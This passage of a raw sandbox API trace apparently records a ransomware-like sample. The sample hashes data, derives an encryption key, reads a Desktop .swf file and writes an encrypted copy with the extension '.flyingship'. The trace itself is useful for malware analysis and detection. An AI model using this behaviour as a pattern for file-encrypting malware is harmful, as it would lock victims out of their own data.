0x6bb458 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0076.240] CryptHashData (hHash=0x6b8b38, pbData=0x6f9708, dwDataLen=0x16, dwFlags=0x1) returned 1 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0076.240] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.241] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1ca8 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.241] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.241] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.241] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0076.241] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.241] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0076.241] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0076.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.242] CryptDeriveKey (in: hProv=0x696a48, Algid=0x660e, hBaseData=0x6b8b38, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8b78) returned 1 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0076.242] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.242] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.242] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0076.242] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0076.242] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.242] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.243] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0076.243] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0076.243] CryptDestroyHash (hHash=0x6b8b38) returned 1 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0076.243] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0076.243] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.243] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.243] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.243] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.243] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.243] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ibbdx1qsrydlz.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0076.244] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.244] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.244] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.244] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0076.244] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x698698 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.245] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.245] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.flyingship.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ibbdx1qsrydlz.flyingship.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0076.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0076.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.246] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.246] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0076.246] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.247] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.247] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0076.247] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x10000, lpOverlapped=0x0) returned 1 [0076.250] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x10a7, lpOverlapped=0x0) returned 1 [0076.250] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0076.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0076.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x32b0020 | out: hHeap=0x650000) returned 1 [0076.252] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0076.252] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.252] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.252] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.253] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.253] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.253] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.253] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.253] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.254] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.254] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.254] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.254] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.254] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.254] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.254] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.254] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0076.254] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0076.255] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.255] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.255] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.255] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.255] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0076.256] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, 